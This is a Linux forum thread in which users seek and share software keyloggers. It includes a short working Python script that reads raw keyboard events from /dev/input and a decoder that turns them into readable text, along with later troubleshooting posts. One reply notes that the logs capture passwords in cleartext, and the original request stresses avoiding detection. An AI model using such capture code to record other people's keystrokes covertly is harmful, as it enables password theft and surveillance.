| View previous topic :: View next topic |
| Author |
Message |
HeXiLeD
l33t
Joined: 20 Aug 2005
Posts: 892
Location: online
|
 Posted: Sat May 27, 2006 6:23 am Post subject: Linux Keylogger |
 |
|
I am looking for a linux keylogger.
so far the best option seems to be a hardwware keylogger such as these ones
from : www.keyghost.com
ie: www.keyghost.com/USB-Keylogger.htm
however its 'detectable' from the outside and still pricy for now, so i am looking for a linux software one.
I have been suggested a few things, such as uing GtkEntry X aplications and sniff X local traffic.
And so far i found one linux keylogger here : http://sourceforge.net/projects/lkl
But i read that it didnt quite work for US layout keyboards and its for x86. can anyone confirm or not?
( i am amd64 )
Questions:
a: can someone add it to portage ?
b: are there any other suggestions?
c: does anyone know any other software keylogger?
The usage is to monitor my box when i am not around.
_________________
443640
My UNSOLVED TOPICS
How to ask questions
Configs & Hardware SPECIFICATIONS |
|
| Back to top |
|
 |
NeddySeagoon
Administrator
Joined: 05 Jul 2003
Posts: 27775
Location: 56N 3W
|
| Posted: Sat May 27, 2006 9:40 am Post subject: |
|
|
Blue-Steel,
There is the kernels evbug, (for event debugging) that logs keystrokes and mouse movements.
It means your logs contain the cleartext of any and every password entered. You can make it a loadable module, to turn it on and off.
_________________
Regards,
NeddySeagoon
Computer users fall into two groups:-
those that do backups
those that have never had a hard drive fail. |
|
| Back to top |
|
|
lxg
l33t
Joined: 12 Nov 2005
Posts: 912
Location: Aachen, Germany
|
| Posted: Sat May 27, 2006 10:23 am Post subject: |
|
|
| NeddySeagoon wrote: | | It means your logs contain the cleartext of any and every password entered. |
I bet that's one of the features he's looking for. 
_________________
lxg.de – codebits and tech talk |
|
| Back to top |
|
|
HeXiLeD
l33t
Joined: 20 Aug 2005
Posts: 892
Location: online
|
| Posted: Wed May 31, 2006 4:58 am Post subject: |
|
|
Allow me a lame question:
when i tail my messages log i get only stuff like this ( evbug.c: Event. Dev: isa0060/serio0/input0, Type: 0, Code: 0, Value: 0 ) related to evbug.
Inside /var/log/ i dont see anything else related to evbug. how do i see the logs in clean text ?
_________________
443640
My UNSOLVED TOPICS
How to ask questions
Configs & Hardware SPECIFICATIONS |
|
| Back to top |
|
|
HeXiLeD
l33t
Joined: 20 Aug 2005
Posts: 892
Location: online
|
|
| Back to top |
|
|
kgraehl
n00b
Joined: 13 Sep 2003
Posts: 54
|
| Posted: Thu Dec 21, 2006 7:35 pm Post subject: |
|
|
I tried a couple programs but none of them really worked very well. So here's a simple key logger that uses evdev (make this a module in your kernel)
| Code: |
modprobe evdev
python -i keylog.py > keys.logfile
|
make sure this is working by
| Code: | tail -f keys.logfile
|
keylog.py:
| Code: |
#!/usr/bin/env python
DEV = '/dev/input/event0'
#if event0 doesn't work, try event1
#DEV = '/dev/input/event1'
fo = open(DEV)
def interpret(keycode,state):
if state == 0:
print '%i up'%keycode
if state == 1:
print '%i down'%keycode
if state == 2:
print '%i repeat'%keycode
while 1:
line = fo.read(16)
if ord(line[10]) != 0:
keycode,state = line[10],line[12]
interpret(ord(keycode),ord(state))
|
Then you just have to interpret this logfile...
Here's a crappy program I wrote to do that:
keylog_read.py
| Code: |
#!/usr/bin/env python
import re
import os
import sys
dumpkeys = os.popen('dumpkeys').readlines()
keyre = re.compile('keycode[\s]*([0-9]*) = ([\S]*)')
dict = {}
for line in dumpkeys:
result = keyre.search(line)
if result:
keycode,char = result.groups()
dict.update({keycode:char})
fo = open(sys.argv[1])
lines = fo.readlines()
def interpret(char,state):
sdict = {'Meta_greater':'.',
'Meta_less':',',
'Meta_Control_m':'\n'}
odict = {'Meta_nul':' '}
if len(char) == 1:
if state != 'up\n':
return char
elif sdict.has_key(char):
return sdict[char]
elif odict.has_key(char):
if state != 'up\n':
return odict[char]
else:
if state == 'up\n':
return '</%s>'%char
elif state == 'down\n':
return '<%s>'%char
return ''
for line in lines:
keycode,state = line.split(' ')
char = dict[keycode]
sys.stdout.write(interpret(char,state))
|
Now run the second program,
| Code: |
python keylog_read.py keys.logfile
|
Now I am going to type some stuff so you can see what the interpreted stuff looks like. I'm going to paste it in right here now I guess... alright here goes.
| Code: |
<Shift>n</Shift>ow <Shift>i</Shift> am going to type some stuff so you can see w
hat the interpreted stuff looks like.. <Shift>i</Shift>m <Meta_Delete></Meta_Del
ete><Meta_Delete></Meta_Delete><Meta_quotedbl></Meta_quotedbl>m going to paste i
t in right here now <Shift>i</Shift> guess...... alright here goes..
|
|
|
| Back to top |
|
|
bigdude5
n00b
Joined: 29 May 2007
Posts: 1
|
| Posted: Tue May 29, 2007 3:17 am Post subject: |
|
|
| Working good. This is the only software keylogger I have found that works for usb keyboards in Linux. I had to make a few changes to the code for it to work with my computer. I might change the code to make the output easier to read. |
|
| Back to top |
|
|
scottricketts
n00b
Joined: 09 Jul 2007
Posts: 1
Location: Ohio
|
| Posted: Mon Jul 09, 2007 6:15 pm Post subject: |
|
|
Things work great until I have to read the file. This is what I get:
<Meta_Control_c></Meta_Control_c><Meta_Control_a></Meta_Control_a><Meta_Control_t></Meta_Control_t> <Meta_Control_n></Meta_Control_n><Meta_Control_o></Meta_Control_o><Meta_BackSpace></Meta_BackSpace><Meta_Control_u></Meta_Control_u><Meta_Control_p></Meta_Control_p><Compose></Compose><Meta_Control_o></Meta_Control_o><Meta_Control_u></Meta_Control_u><Meta_Control_t></Meta_Control_t>
<Up></Up><Up></Up>
<Shift><Compose></Compose></Shift> <Meta_Control_l></Meta_Control_l><Meta_Control_o></Meta_Control_o><Meta_Control_g></Meta_Control_g>
<Meta_Control_v></Meta_Control_v><Meta_Tab> </Meta_Tab><Meta_Control_l></Meta_Control_l><Meta_Control_o></Meta_Control_o><Meta_Control_g></Meta_Control_g>
<Meta_Delete></Meta_Delete><Meta_Escape></Meta_Escape>
If I just remove the Meta_Control's I get something almost readable. Any ideas why it's doing this? |
|
| Back to top |
|
|
urcindalo
Guru
Joined: 08 Feb 2005
Posts: 518
Location: Almeria, Spain
|
| Posted: Mon Mar 01, 2010 7:12 am Post subject: |
|
|
| kgraehl wrote: | Now run the second program,
| Code: |
python keylog_read.py keys.logfile
|
|
Hi! When I try to run the keylog reader I get this error: | Code: | $ python keylog_read.py keys.logfile
Couldn't get a file descriptor referring to the console
Traceback (most recent call last):
File "keylog_read.py", line 43, in <module>
char = dict[keycode]
KeyError: '\x1b[?1034h3' |
I use an es_ES.utf8 locale with an es.map.gz keyboard. What should I do? This is an excerpt from my keys.logfile file: | Code: | $ cat keys.logfile
3 up
139 up
28 up
3 up
139 up
14 up
139 up
139 up
111 up
139 up
2 up
139 up
3 up
... |
Thanks. |
|
| Back to top |
|
|
urcindalo
Guru
Joined: 08 Feb 2005
Posts: 518
Location: Almeria, Spain
|
| Posted: Mon Mar 01, 2010 7:23 am Post subject: Looking for a working keylogger |
|
|
Hi! I want to install a good keylogger for myself. Yes, for my own account, not to spy someone else's account or other computer.
My box is only used by me and I want to log everything I type in my account.
I want to register in a text file every meaningful keystroke I press, no matter where: browser, console....
What should I do/install? Any experiences? I use an es_ES.utf8 locale with an es.map.gz keyboard mapping.
Thanks in advance. |
|
| Back to top |
|
|
massimo
Veteran
Joined: 22 Jun 2003
Posts: 1046
Location: Austria
|
| Posted: Mon Mar 01, 2010 8:15 am Post subject: |
|
|
How about [1].
[1] http://code.google.com/p/logkeys/
_________________
Hello, IT. Have you tried turning it off and on again? |
|
| Back to top |
|
|
urcindalo
Guru
Joined: 08 Feb 2005
Posts: 518
Location: Almeria, Spain
|
| Posted: Mon Mar 01, 2010 8:32 am Post subject: |
|
|
Thanks for the suggestion.
I've installed it, but when I launch the program I get this error: | Code: | $ logkeys --start --output test.log
Couldn't get a file descriptor referring to the console |
I'm completely clueless  |
|
| Back to top |
|
|
desultory
Administrator
Joined: 04 Nov 2005
Posts: 7058
|
| Posted: Mon Mar 01, 2010 10:07 am Post subject: |
|
|
| Merged the preceding three posts. |
|
| Back to top |
|
|
urcindalo
Guru
Joined: 08 Feb 2005
Posts: 518
Location: Almeria, Spain
|
| Posted: Wed Apr 07, 2010 11:10 am Post subject: |
|
|
| urcindalo wrote: | Thanks for the suggestion.
I've installed it, but when I launch the program I get this error: | Code: | $ logkeys --start --output test.log
Couldn't get a file descriptor referring to the console |
I'm completely clueless |
Nobody? |
|
| Back to top |
|
|
|
Other Things Gentoo
